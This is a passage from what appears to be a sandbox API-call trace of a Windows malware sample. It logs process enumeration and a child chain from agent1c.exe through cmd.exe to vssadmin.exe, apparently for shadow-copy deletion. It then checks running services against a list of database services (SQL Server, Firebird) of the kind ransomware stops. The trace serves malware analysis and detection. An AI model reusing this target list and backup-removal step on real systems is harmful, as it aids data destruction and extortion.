th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.769] lstrlenW (lpString="svchost.exe") returned 11 [0041.769] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.770] lstrlenW (lpString="svchost.exe") returned 11 [0041.770] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.771] lstrlenW (lpString="svchost.exe") returned 11 [0041.771] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.771] lstrlenW (lpString="svchost.exe") returned 11 [0041.771] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0041.772] lstrlenW (lpString="audiodg.exe") returned 11 [0041.772] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.773] lstrlenW (lpString="svchost.exe") returned 11 [0041.773] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.773] lstrlenW (lpString="svchost.exe") returned 11 [0041.773] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0041.774] lstrlenW (lpString="dwm.exe") returned 7 [0041.774] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0041.775] lstrlenW (lpString="explorer.exe") returned 12 [0041.775] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0041.775] lstrlenW (lpString="spoolsv.exe") returned 11 [0041.776] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0041.776] lstrlenW (lpString="taskhost.exe") returned 12 [0041.776] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.777] lstrlenW (lpString="svchost.exe") returned 11 [0041.777] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0041.778] lstrlenW (lpString="taskeng.exe") returned 11 [0041.778] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0041.778] lstrlenW (lpString="taskhost.exe") returned 12 [0041.778] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0041.779] lstrlenW (lpString="entrepreneur.exe") returned 16 [0041.779] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0041.780] lstrlenW (lpString="andrew kinds.exe") returned 16 [0041.780] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0041.780] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0041.780] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0041.781] lstrlenW (lpString="educated.exe") returned 12 [0041.781] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0041.781] lstrlenW (lpString="servers.exe") returned 11 [0041.781] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0041.782] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0041.782] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0041.783] lstrlenW (lpString="gbp_chair.exe") returned 13 [0041.783] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0042.056] lstrlenW (lpString="attention infected.exe") returned 22 [0042.056] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0042.057] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0042.057] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0042.058] lstrlenW (lpString="pattern amateur.exe") returned 19 [0042.058] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0042.058] lstrlenW (lpString="referral.exe") returned 12 [0042.058] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0042.059] lstrlenW (lpString="copyingseems.exe") returned 16 [0042.059] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0042.060] lstrlenW (lpString="spin generally.exe") returned 18 [0042.060] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0042.060] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0042.061] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0042.061] lstrlenW (lpString="transmit.exe") returned 12 [0042.061] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0042.062] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0042.062] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0042.063] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0042.063] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0042.063] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0042.063] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0042.064] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0042.064] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0042.065] lstrlenW (lpString="delight.exe") returned 11 [0042.065] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0042.065] lstrlenW (lpString="within enquiry.exe") returned 18 [0042.065] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0042.066] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0042.066] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0042.066] lstrlenW (lpString="agent1c.exe") returned 11 [0042.066] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0042.067] lstrlenW (lpString="cmd.exe") returned 7 [0042.067] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0042.068] lstrlenW (lpString="conhost.exe") returned 11 [0042.068] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0042.069] lstrlenW (lpString="vssadmin.exe") returned 12 [0042.069] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0042.069] lstrlenW (lpString="VSSVC.exe") returned 9 [0042.069] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0 [0042.070] CloseHandle (hObject=0x1d8) returned 1 [0042.070] Sleep (dwMilliseconds=0x1f4) [0042.880] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x3ed0408 [0042.984] EnumServicesStatusExW (in: hSCManager=0x3ed0408, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0042.984] GetLastError () returned 0xea [0042.984] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12c6) returned 0x3800fb0 [0042.985] EnumServicesStatusExW (in: hSCManager=0x3ed0408, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3800fb0, cbBufSize=0x12c6, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3800fb0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0042.985] CloseServiceHandle (hSCObject=0x3ed0408) returned 1 [0042.985] lstrlenW (lpString="Appinfo") returned 7 [0042.985] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0042.985] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0042.985] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0042.986] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0042.986] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0042.986] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0042.986] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0042.986] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0042.986] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0042.986] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0042.986] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0042.986] lstrlenW (lpString="AudioSrv") returned 8 [0042.986] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0042.986] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0042.986] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0042.986] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0042.986] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0042.986] lstrlenW (lpString="BFE") returned 3 [0042.986] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0042.986] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0042.986] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0042.986] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0042.986] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0042.986] lstrlenW (lpString="CryptSvc") returned 8 [0042.986] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0042.986] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0042.986] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0042.986] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0042.986] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0042.986] lstrlenW (lpString="CscService") returned 10 [0042.986] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0042.986] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0042.986] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0042.986] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0042.986] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0042.986] lstrlenW (lpString="DcomLaunch") returned 10 [0042.986] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0042.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0042.987] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0042.987] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0042.987] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0042.987] lstrlenW (lpString="Dhcp") returned 4 [0042.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0042.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0042.987] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0042.987] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0042.987] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0042.987] lstrlenW (lpString="Dnscache") returned 8 [0042.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0042.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0042.987] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0042.987] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0042.987] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0042.987] lstrlenW (lpString="DPS") returned 3 [0042.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0042.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0042.987] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0042.987] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0042.987] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0042.987] lstrlenW (lpString="eventlog") returned 8 [0042.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0042.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0042.987] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0042.987] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0042.987] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0042.987] lstrlenW (lpString="EventSystem") returned 11 [0042.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0042.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0042.987] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0042.988] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0042.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0042.988] lstrlenW (lpString="gpsvc") returned 5 [0042.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0042.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0042.988] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0042.988] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0042.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0042.988] lstrlenW (lpString="iphlpsvc") returned 8 [0042.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0042.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0042.988] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0042.988] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0042.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0042.988] lstrlenW (lpString="LanmanServer") returned 12 [0042.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0042.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0042.988] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0042.988] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0042.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0042.988] lstrlenW (lpString="LanmanWorkstation") returned 17 [0042.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0042.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0042.988] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0042.988] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0042.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0042.988] lstrlenW (lpString="lmhosts") returned 7 [0042.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0042.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0042.988] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0042.988] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0042.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0042.988] lstrlenW (lpString="MMCSS") returned 5 [0042.989] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0042.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0042.989] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0042.989] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0042.989] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0042.989] lstrlenW (lpString="MpsSvc") returned 6 [0042.989] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0042.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0042.989] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0042.989] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0042.989] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0042.989] lstrlenW (lpString="Netman") returned 6 [0042.989] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0042.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0042.989] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0042.989] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0042.989] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0042.989] lstrlenW (lpString="netprofm") returned 8 [0042.989] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0042.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned 